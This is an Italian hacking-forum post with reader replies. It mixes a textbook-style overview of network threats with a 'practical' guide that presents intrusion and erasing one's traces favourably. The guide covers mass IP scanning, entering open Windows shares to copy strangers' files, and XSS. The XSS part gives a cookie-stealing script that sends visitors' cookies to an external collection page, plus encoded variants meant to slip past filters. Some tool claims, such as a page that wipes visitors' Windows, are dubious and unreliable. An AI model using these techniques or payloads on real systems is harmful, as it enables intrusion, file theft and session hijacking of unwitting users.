Vi è una continua lotta tra hacker, che cercano di sfruttare qualunque punto debole esistente, e sviluppatori, che tentano di eliminarli. È esattamente quanto accade tra fabbricanti di serrature e scassinatori o tra produttori di sistemi di allarme e ladri d'auto. Ecco perché gli sviluppatori di software rilasciano aggiornamenti per l'eliminazione dei punti deboli conosciuti e perché è sempre consigliabile installare tali aggiornamenti.

Minacce comuni alla protezione delle reti
Le motivazioni degli hacker sono di varia natura (profitto, dolo, gloria), ma le loro modalità operative sono simili. Vi sono diversi tipi di minacce, ciascuna delle quali ha infinite varianti:
Spoofing. Lo spoofing si manifesta in modi diversi. Lo spoofing degli IP consiste nella creazione di pacchetti che sembrano provenire da un indirizzo IP diverso da quello effettivo. Si tratta di una tecnica utilizzata principalmente nel caso di attacchi unilaterali (per esempio gli attacchi DoS). Infatti, se i pacchetti sembrano provenire da un computer presente nella rete locale, possono tranquillamente attraversare la protezione del firewall, concepita per difendere la rete da attacchi esterni. Gli attacchi condotti attraverso lo spoofing degli indirizzi IP sono difficili da individuare e richiedono tutta l'abilità e i mezzi necessari per monitorare e analizzare i pacchetti di dati. Lo spoofing della posta elettronica, invece, consiste nel comporre un messaggio e-mail il cui campo Da non indica l'effettivo indirizzo del mittente. Ad esempio, verso la fine del 2003 circolava su Internet una serie di messaggi e-mail fasulli che sembravano contenere un annuncio ufficiale di aggiornamenti alla protezione da parte di Microsoft e che contenevano un falso indirizzo e-mail Microsoft.


Manomissione.
La manomissione consiste nel modificare il contenuto dei pacchetti durante la loro trasmissione in Internet oppure nel modificare i dati memorizzati sui dischi rigidi dei computer dopo che la rete è stata violata. Per esempio, un hacker potrebbe posizionare una presa su una rete per intercettare i pacchetti in uscita e accedere alle informazioni o alterarle quando lasciano la rete aziendale.


Disconoscimento.
Il disconoscimento indica la capacità di un utente di negare, mentendo, di avere commesso azioni che è impossibile provare altrimenti. Per esempio, un utente che abbia eliminato un file può facilmente negare di essere il responsabile in mancanza di meccanismi di controllo che possano provare il contrario.


Divulgazione di informazioni. La divulgazione di informazioni consiste nell'esporre informazioni a individui che normalmente non vi avrebbero accesso.


Attacchi DoS (Denial of Service). Gli attacchi DoS sono assalti informatici lanciati da un attacker allo scopo di sovraccaricare o interrompere un servizio di rete, ad esempio un server Web o un file server. Ad esempio, a seguito di un attacco DoS un server potrebbe essere così impegnato a rispondervi da ignorare le richieste di connessione legittime. Nel corso del 2003 sono stati organizzati imponenti attacchi DoS contro diverse grandi aziende su Internet, tra cui Yahoo e Microsoft, nel tentativo di intasare i server.


Elevazione dei privilegi. L'elevazione dei privilegi è un procedimento mediante il quale un utente induce un sistema a concedere diritti non autorizzati, generalmente allo scopo di danneggiare o distruggere il sistema. Ad esempio, un hacker potrebbe accedere a una rete attraverso un account guest, quindi individuare un punto debole del software che gli consenta di modificare i suoi privilegi da guest a amministratore.
Gli hacker generalmente sfruttano a loro vantaggio la capacità di elaborazione dei computer, utilizzando un virus per sferrare un attacco DoS a centinaia di migliaia di computer contemporaneamente oppure facendo uso di un programma per l'identificazione delle password per individuare quella corretta tra tutte le parole di senso compiuto. Le prime password che verificano sono ovviamente "password", "accesso" e le password che coincidono con il nome utente. Dispongono di programmi in grado di sondare a caso tutti gli indirizzi IP presenti su Internet per individuare sistemi non protetti. Quando ne trovano uno, grazie ai programmi di scansione delle porte cercano di individuarne una aperta cui sferrare l'attacco. Se ne trovano una, consultano la libreria dei punti deboli più conosciuti per trovare il modo di accedere al sistema. Nel caso di attacchi più mirati (ad esempio nei casi di spionaggio industriale) il metodo più efficace è costituito dal connubio tra tecnologia e ingegneria sociale. Esempi di questo metodo sono: indurre membri del personale a rivelare informazioni di natura confidenziale, esaminare i cestini della carta straccia alla ricerca di informazioni importanti o semplicemente controllare i bigliettini affissi ai monitor per scoprire le password.

Introduzione

Fare Hacking non vuol dire entrare nei sistemi per distruggere dei file o per far saltare il computer a qualche persona, inondare di email qualche indirizzo o vantarsi in IRC sfoggiando i vari bot o scripz…e soprattutto…dire al mondo che sei un hacker.

Fare hacking è introdursi in un sistema, esplorarlo e prendere le informazioni che servono, cancellando le proprie tracce per non farsi beccare...

Tutto questo per la conoscenza, per il sapere….credo che il sapere sia profonda libertà.
Il motivo per cui si fa hacking poi varia da persona a persona.
Il mio motivo è l’esplorazione, trovare segreti, e spesso… aiutare gli aspiranti…
Alcune persone possono fare Hacking per i miei stessi motivi o solamente mostrare la propria abilità, per diventare popolari, per farsi nuovi amici o per conquistare una ragazza… alla fine….ognuno ha i suoi motivi…

Se vuoi diventare un hacker, il consiglio che ti posso dare è di leggere molto e, di girare sui siti che ti segnaliamo nella Site Section qui su Hackers.it.
Parla e scrivi in inglese, non perché sia una lingua migliore dell’italiano ma solamente perché è internazionale, tutti nel mondo, tutti noi, parliamo inglese…Inoltre se qualche altro hacker o qualche pirla ti provoca o ti prende in giro ….ignoralo…….non dare importanza a cio che certi cazzoni possano dire…vai dritto per la tua strada …


Parte Pratica

Vediamo "i metodi di lavoro" adottati da hackers e crackers e gli strumenti a loro disposizione

La prima cosa che un pirata deve fare é quella di trovare indirizzi IP disponibili per l'attacco. A questo scopo attiva il suo programma di scanning (Legion from Rhino9, per citarne uno, vaglia 254 blocchi di IP's insieme, ovvero 64.516 computers alla volta!) che gli consente di identificare i computer interessanti.

Mentre lo scanner continua a lavorare, il pirata comincia a visitare le singole macchine, al fine di trovare quello che sta cercando ardentemente: per esempio dei files bancari o riservati.

Altro scanner famoso é Winhackgold di Rootshell che lavora sotto Unix. Grazie alla sua rapidità di esecuzione, é uno dei programmi preferiti dai crackers: é in grado di vagliare in pochi secondi un'intera classe di blocchi C, come pure multiple classi di blocchi C.

La connessione

Una volta trovati gli indirizzi IP, il pirata si collegherà con le macchine di suo interesse, utilizzando diversi metodi di connessione. Uno dei metodi é quello di utilizzare semplicemente lo Start >Run di Windows, scrivendo il numero dell'IP preceduto da \\ (es:\\209.238.154.25).

Un'altro metodo, é quello di eseguire il .Bat file nella linea di comando del programma Winhackergold che connetterà tutti i computers in un'unica turnata e li porterà nel piano di lavoro dell'hacker o cracker.



Entrare nei Driver

A questo punto il pirata cliccherà sul drive che vuole visitare ed apparirà l'esploratore di Windows con tutti i files e directories contenuti nel drive prescelto. Il cracker sarà adesso in grado di operare su ogni comando di explorer: copiare e trasferire, cancellare, rinominare, editare, cercare, creare nuovi files e directories, leggere files, ecc.



Dopo aver copiato e trasferito ogni dato di suo interesse nel proprio computer, l'hacker o cracker potrà poi dedicare tutto il tempo che vorrà per analizzarne il contenuto.

Esistono altri metodi a disposizione degli hackers e crackers per trovare computers da attaccare. Uno di questi é l'utilizzo del plugin per le Chat contenuto in Winhackgold: se il pirata si trova nella stanza di discussione, tenterà di connettersi simultaneamente con tutti i computers presenti nella stanza, per mezzo del comando Exploit all.



In tal modo, il pirata discuterà con i presenti per tenerli occupati mentre, in realtà, sarà intento a copiare i loro files!



Altro "programmino" della categoria, ma con fini diversi, é rappresentato da Winhackgold smbls 98 tgz che, ove piazzato in certi siti Web, censirà in un file tutti i visitatori che hanno un sistema aperto. L'aspetto "unico" di questo programma, é che possiede un'opzione per distruggere Windows dai computers dei visitatori, una volta finita di caricare la pagina Web!

Ricorda ke esistono piu di 65000 porte in un pc e quasi tutte utilizzano metodi diversi x l'attacco, tipo la porta 23 si accede da telnet ( o indirizzo_ip 23 ) La 21 e quella dell'FTP e via dicendo





XSS (Cross Site Scripting)

La Tecnica XSS - Cross Site Scripting
Il motivo della sigla xss e non css , è proprio per evitare di far confondere i meno esperti con la sigla css che in gergo webmaster sta per “Cascading Style Sheets” L’attacco XSS appartiene alla tipologia injection, quindi si tratta di immissione di codice arbitrario in input alle pagine web. A differenza di sql injection ed altri attacchi alle web application trattati precedentemente a questo attacco , sono vulnerabili siti dinamici e non . L’attacco può essere portato a compimento su qualsiasi sito che presenti l’utilizzo di tecnologie come JavaScript, VBScript, ActiveX, HTML e Flash. Per chi non conosce queste tecnologie , basti pensare che si tratta di linguaggi e applicazioni che vengono eseguiti direttamente dal vostro web browser (internet explorer, netscape, Mozilla Firefox, ecc.)

Come al solito, questa vulnerabilità è dovuta agli errori dei programmatori, che molto spesso trascurano completamente la validazione delle informazioni passate in input al sito dagli utenti.

L’attacco Cross Site Scripting è quindi possibile d’attuazione, quando un sito web prende in input dati su cui effettua delle operazioni. Queste informazioni vengono inviate al sito solitamente tramite url. Questi dati, in siti non protetti, vengono visualizzati cosi’ come sono stati inseriti dagli utenti. Potenzialmente la vittima dell’attacco non è solo il sito, ma anche l’utente, proprio perché occorre un semplice link che porta ad una pagina di un sito non protetta per creare danni. Cliccando infatti incautamente su uno di questi link che si può trovare su un sito web o una mail , si può cadere vittima di questo attacco il cui fine è solitamente quello di raccogliere dati degli utenti , leggere i cookie, dirottare l’utente su un altro sito o visualizzare falsa pubblicità.

Analisi dell’attacco

Immaginate di essere su un forum o di scrivere su un guestbook
Nel testo scriveremo un cosa come:
<script>location='http://www.eurohackers.it/';</script>

Successivamente salviamo il nostro testo su un forum non protetto da questo attacco e avremo come risultato che chi carica la pagina con il nostro messaggio , sarà reindirizzato al sito
Perfavore, Entra oppure Registrati per vedere i Link!


Detto così non sembra poi tanto dannoso, ma pensate se sul sito su cui effettuo il reindirizzamento , creo pagine che permettono la raccolta dei dati ,

utilizzando un codice del tipo:
<script>document.location='http://www.sito.com/leggo-cookie.asp?'+document.cookie</script>

Ottengo appunto il risultato di poter leggere i cookie rilasciati dal sito vittima e di inviarli ad una pagina appositamente creata per l’archiviazione (leggo-cookie.asp). Se i cookie non sono crittografati , come succede spesso , si ha che l’attaccher otterrà user e password di tutte le persone che visitano la pagina del forum contenente il suo messaggio.Si può pensare anche ad un codice che faccia comparire qualche messaggio di alert come finestre di errore o che carichi all’interno della pagina attaccata un sito esterno.

È possibile ad esempio, manipolare il tag <img> che in html si occupa di visualizzare le immagini in modo che faccia comparire una finestra di alert
<IMG SRC='javascript:alert("NoTrace Security TEST")'>

La stessa cosa per eludere eventuali filtri del web master potrebbe essere scritta informato Hex

<IMG SRC='%6A%61%76%61%73%63%72%69%70%74%3A%61%6C%65%72%74%28%22%4E%
6F%54%72%61%63%65%20%53%65%63%75%72%69%74%79%20%54%45%53%54%22%29'>

Oppure in decimale:
<IMG SRC='javascript:ale&
#114t("NoTrace Secur&#
105ty TEST")'>

Analizziamo ora un attacco Cross Site Scripting ( XSS ) iniettando codice in un url tramite link :

Pensiamo ad un sito con motore di ricerca in stile google che nel momento in cui clicchiamo sul pulsante “cerca”, invia le informazioni con “metodo get” quindi nell’url del browser. Se ad esempio scriviamo su google “ Anonimato ” e clicchiamo su “cerca” , possiamo leggere nel campo indirizzo del browser una cosa del tipo: /search?q=Anonimato

Tornando al nostro esempio immaginiamo un sito che utilizza lo stesso criterio
Perfavore, Entra oppure Registrati per vedere i Link!


Fonte: Mia

Nel punto del S.E. , creare l'email con propri domini è a pagamento XD
 
secondo me non c'era bisogno di quotare tutto il mex. cmq bella guida ma non c'entra niente con l'hacking. leggi qualcosa su Richard Stallman. Lui è l'ultimo vero hacker della storia.
 
Utile, non fa niente se la hai copiata o no ma è comunque interessante.